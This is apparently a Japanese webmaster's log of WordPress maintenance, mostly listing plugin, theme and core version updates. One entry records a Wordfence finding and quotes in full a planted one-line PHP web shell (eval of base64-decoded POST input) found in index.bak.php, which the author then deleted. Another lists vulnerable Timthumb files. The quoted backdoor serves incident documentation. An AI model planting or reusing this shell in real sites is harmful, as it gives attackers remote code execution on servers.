投稿日:

WordPress、プラグイン、テーマのアップデート定期メンテナンス9月

熊本地震復興支援チャリティーコンサート

実行作業

WordPress 4.3 へのアップデート

  • プラグイン(7)のアップデート。
    • Beaver Builder Plugin (Lite Version) 1.6.1.1 → 1.6.2.1
    • Header and Footer 1.6.6 → 1.6.7
    • Jetpack by WordPress.com 3.6.1 → 3.7
    • Google AdSense by BestWebSoft 1.35 → 1.36
    • TinyMCE Templates 4.3.6 → 4.4.0 Add filter hook – tinymce_templates_enable_media_buttons.
    • WP Google Fonts v3.1.3 → v3.1.4
    • WP Multibyte Patch 2.3.1 → 2.4
  • テーマ(13)のアップデート。
    • EvoLve 3.4.3 → 3.4.4
    • Magazine Basic 3.0.5 → 3.0.6
    • Auberge 1.4.7 → 1.4.8
    • ColorWay 3.3.3 → 3.3.8
    • Exclusive 1.0.30 → 1.0.32
    • SuevaFree 1.3.5 → 1.3.6
    • Twenty Eleven 2.1 → 2.2
    • Twenty Fifteen 1.2 → 1.3
    • Twenty Fourteen 1.4 → 1.5
    • Twenty Ten 1.9 → 2.0
    • Twenty Thirteen 1.5 → 1.6
    • Twenty Twelve 1.7 → 1.8
投稿日:

WordPress、プラグイン、テーマのアップデート定期メンテナンス8月

熊本地震復興支援チャリティーコンサート

実行作業

WordPress 4.2.4–ja へのアップデート

  • プラグイン(3)のアップデート。
    • Beaver Builder Plugin (Lite Version) 1.6.0.1 → 1.6.1.1
    • Header and Footer 1.6.5 → 1.6.6
    • Jetpack by WordPress.com 3.6 → 3.6.1
  • テーマ(2)のアップデート。
    • EvoLve 3.3.0 → 3.4.3
    • Magazine Basic 3.0.4 → 3.0.5
投稿日:

プラグインとテーマのアップデート 2015年7月

実行作業

  • プラグインのアップデート。
    • Akismet 3.1.2 → 3.1.3
    • Beaver Builder Plugin (Lite Version) 1.5.9 → 1.6.0.1
    • Google AdSense by BestWebSoft 1.34 → 1.35
    • Header and Footer 1.6.4 → 1.6.5
    • Jetpack by WordPress.com 3.5.3 → 3.6
    • WP Google Fonts v3.1.2 → v3.1.3
  • テーマのアップデート。
    • Exclusive 1.0.28 → 1.0.30
    • Responsive 1.9.7.6 → 1.9.7.7
投稿日:

プラグインとテーマのアップデート 2015年6月

実行作業

  • プラグインのアップデート。
    • Akismet 3.1.1 → 3.1.2
    • Beaver Builder Plugin (Lite Version) 1.5.6 → 1.5.9
    • Google AdSense by BestWebSoft 1.33 → 1.34
    • WP Google Fonts v3.1.1 → v3.1.2
  • テーマのアップデート。
    • Auberge 1.4.4 → 1.4.7
    • ColorWay 3.3.2 → 3.3.3
    • EvoLve 3.2.7 → 3.3.0
    • Montezuma 1.2.7 → 1.2.8
投稿日:

コアのアップグレード、プラグインとテーマのアップデート 2015年5月

実行作業

  • WordPressのアップグレード。
    • 4.1.5 → 4.2.2-Ja
  • プラグインのアップグレード。
    • Akismet 3.0.4 → 3.1.1
    • Jetpack by WordPress.com 3.3.3 → 3.5.3
    • WP Multbyte Patch 2.2 → 2.3.1
  • プラグインのアップデート。
    • Page Links To 2.9.5 → 2.9.6
    • Child Pages Shortcode 1.9.2 → 1.9.3
    • Google AdSense by BestWebSoft 1.32 → 1.33
    • Header and Footer 1.6.3 → 1.6.4
    • TinyMCE Templates 4.3.3 → 4.3.6
    • Wordfence Security 5.3.6 → 5.3.12
  • テーマのアップデート。
    • Twenty Fifteen 1.0 → 1.2
    • Twenty Ten 1.8 → 1.9
    • Twenty Eleven 2.0 → 2.1
    • Twenty Thirteen 1.4 → 1.5
    • Twenty Twelve 1.6 → 1.7
    • Twenty Fourteen 1.3 → 1.4
    • Auberge 1.2.5 → 1.4.4
    • ColorWay 3.3.0 → 3.3.2
    • EvoLve 3.1.0 → 3.2.7
    • ComicPress 4.2.1 → 4.2.2
    • Exclusive 1.0.26 → 1.0.28

コアのアップグレードに伴うプラグインの追加アップグレード。

  • 翻訳の更新

現在のテーマ「Auberge」使用上、効果的活用に推奨のプラグインの新規インストール。

投稿日:

コアのアップグレード、プラグインとテーマのアップデート 2015年3月

実行作業

  • WordPressのアップグレード。
    • 3.8 → 4.1.1-Ja
  • プラグインのアップグレード。
    • Akismet 2.5.9 → 3.0.4
    • Child Pages Shortcode 1.8.0 → 1.9.2
    • Google AdSense 1.26 → 1.32
    • Header and Footer 1.4.5 → 1.6.2
    • Maintenance 2.0.1 → 2.4
    • Wordfence Security 3.8.9 → 5.3.6
  • プラグインのアップデート。
    • Page Links To 2.9.3 → 2.9.4
  • テーマのアップデート。
    • WordPress Default 1.6 → 1.7.2
    • WordPress Classic 1.5 → 1.6
    • Twenty Ten 1.6 → 1.8
    • Twenty Eleven 1.7 → 2.0
    • Twenty Thirteen 1.1 → 1.4
    • Twenty Twelve 1.3 → 1.6
    • Twenty Fourteen 1.0 → 1.3
    • Yoko 1.1 → 1.2.1
    • ColorWay 3.1 → 3.2.9
    • EvoLve 2.8.0 → 3.1.0
    • ComicPress 4.0.5 → 4.2.1
    • Gommero 1.1.3 → 1.2.0
    • Montezuma 1.1.9 →1.2.4
    • Origin 0.5.6 →0.5.8
    • PageLines 1.4.5 → 1.4.6
    • Pinboard 1.1.2 → 1.1.12
    • Readify 311212.1.3 → 311212.1.6
    • Responsive 1.9.4.3 → 1.9.7.6

コアのアップグレードに伴うプラグインの追加アップグレード。

  • Jetpack by WordPress.com 2.7.2 → 3.3.2
  • TinyMCE Templates 3.3.0 → 4.3.3
  • WP Multibyte Patch 1.9 → 2.2
投稿日:

コアのアップグレード、プラグインとテーマのアップデート

実行作業

  • WordPressのアップグレード。
    • 3.6.1 → 3.8
  • プラグインのアップグレード。
    • Maintenance 1.2.3 → 2.0.1
  • プラグインのアップデート。
    • Jetpack by WordPress.com 2.5 → 2.7
    • Google AdSense Plugin 1.22 → 1.26
    • Header and Footer 1.4.4 → 1.4.5
    • TinyMCE Templates 3.1.0 → 3.3.0
    • Wordfence Security 3.8.3 → 3.8.9
    • WP Multibyte Patch 1.7 → 1.9
  • テーマのアップデート。
    • Twenty Eleven 1.6 → 1.7
    • Twenty Thirteen 1.0 → 1.1
    • Twenty Twelve 1.2 → 1.3
    • Yoko 1.0.5 → 1.1
    • ColorWay 3.0 → 3.1
    • EvoLve 2.5.0 → 2.8.0
    • Magazine Basic 3.0.3 → 3.0.4
    • Pinboard 1.1.0 → 1.1.2
    • Responsive 1.9.3.5 → 1.9.4.3
投稿日:

Wordfence スキャン index.bak.php を検出

Wordfence をインストール。スキャンでの不正ファイルを発見。これをFTPで削除。
1日1回定期審査のメール受信をアクティベートする。

This file may contain malicious executable code

Filename: index.bak.php
File type: Not a core, theme or plugin file.
Issue first detected: 33 mins ago.
Severity: Critical
Status New

This file is a PHP executable file and contains an eval() function and base64() decoding function on the same line. This is a common technique used by hackers to hide and execute code. If you know about this file you can choose to ignore it to exclude it from future scans.

index.bak.php が作成され、次の一行が書かれていた。

<?php ($_=$_POST).($_1=’_’).($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>

.htaccess には改ざんされた様子はない。偽装ファイルも無いようで、恐らく3つのサイトを入れ替えながら更新している過程で改ざんされたと思われる。

投稿日:

Timthumb をスキャン 5ファイルを検出、3ファイルが脆弱

Timthumb と類似のファイルを検出。5ファイルのうち3ファイルは脆弱でバックドアにされている可能性もある。

  • テーマ『Arras Theme』内ライブラリに Timthumb を発見したので、当テーマを削除。
  • テーマ『Producer』内に Timthumb を発見したので、当テーマを削除。
  • テーマ『NewsPaper』内スクリプトに Timthumb を発見したので、当テーマを削除。
  • テーマ『Berita Free』内ライブラリに Timthumb を発見したので、当テーマを削除。

 

Status Version Filename Full Path
Outdated 2.8.3 timthumb.php /home/〜/wp-content/themes/arras-theme/library/timthumb.php
Vulnerable 1.12 cropper.php /home/〜/wp-content/themes/producer/cropper.php
Outdated 2.8.10 resize.php /home/〜/wp-content/themes/newspaper/scripts/resize.php
Vulnerable 2.8 thumb.php /home/〜/wp-content/themes/berita_free/lib_frame/thumb.php
Vulnerable 0 timthumb-config.php /home/〜/wp-content/themes/berita_free/lib_frame/timthumb-config.php